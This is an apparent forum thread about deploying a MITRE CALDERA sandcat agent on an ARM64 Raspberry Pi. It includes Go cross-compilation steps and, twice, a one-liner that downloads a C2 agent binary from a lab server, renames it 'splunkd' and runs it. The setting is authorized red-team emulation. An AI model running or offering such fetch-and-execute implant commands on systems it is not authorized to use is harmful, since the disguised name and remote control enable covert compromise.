How to deploy an agent on raspberry pi？

[Brsacher]

Hi Caldera friend,
I deployed an agent on raspberry pi（kali-linux-2021.3-rpi4-nexmon-arm64）,
Use instruction：

server="http://192.168.138.138:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;chmod +x splunkd;./splunkd -server $server -group red -v

but I received such an error:

bash:./splunk:cannot execute binary file:Exec format error

I'm sure my raspberry pi system is 64 bit.

So, what can I do to solve the problem？

Thanks！

[emmanvg]

Hi @Brsacher,

Thanks for raising this question! The pre-compiled binaries under the mitre/sandcat plugin are for x86-64 based machines. Since you want to run an agent under the raspberry pi with an ARM 64-bit architecture it means you will need to recompile the agents on the server.

Unfortunately at the time of this response you will need to manually perform the actions. You will need to install Go on the machine hosting the CALDERA server, locate the agent source code directory caldera/plugins/sandcat/gocat, download the Go dependencies, check that linux/aarch64 is an available cross-compilation target on your machine and finally run the compile command. Below is a recap with the expected commands:

cd caldera/plugins/sandcat/gocat
go mod tidy
uname -m
go tool dist list | grep linux
GOOS=linux GOARCH=arm64 go build -o ../payloads/sandcat.go-linux-arm64 -ldflags="-s -w" sandcat.go

Note that the command to download the agent into the Raspberry Pi will be slightly different now because CALDERA is built to dynamically compile the sandcat agent when Golang is installed in the machine. While providing these instructions I observed a couple of issues in code that will need to be addressed if we want to compile for other architectures.

On your Raspberry Pi you will now run the command as follows, and it will bypass the dynamic compilation:

server="http://192.168.138.138:8888";curl -s -X POST -H "file:sandcat.go-linux-arm64" $server/file/download > splunkd;chmod +x splunkd;./splunkd -server $server -group red -v

This is the quickest way to get you going for now. We will be looking into how to make it easier to dynamically compile agents for other architectures. Let me know how it goes!

[Brsacher]

This is extremely useful.I solve the problem according to your steps
THANKS A LOT!!!!!! 👍👍👍👍👍👍

ps: I also have two other questions.
One : I want to use several raspberry pies (kali linux)and a desktop computer(ubuntu 20.04LTS) to build an ad-hoc network. Can caldera software also be used on the ad-hoc network?
Two : Can caldera software cross domains (agents in one LAN, and caldera server in another LAN)?

THANKS A LOT AGAIN!!!!!

[emmanvg]

To both of your questions, the answer is yes. There are no requirements specified in CALDERA in regards to networking type or topology as long as the agents are able to beacon back to the server (there is a route to reach the server, the connections are not being blocked, etc.)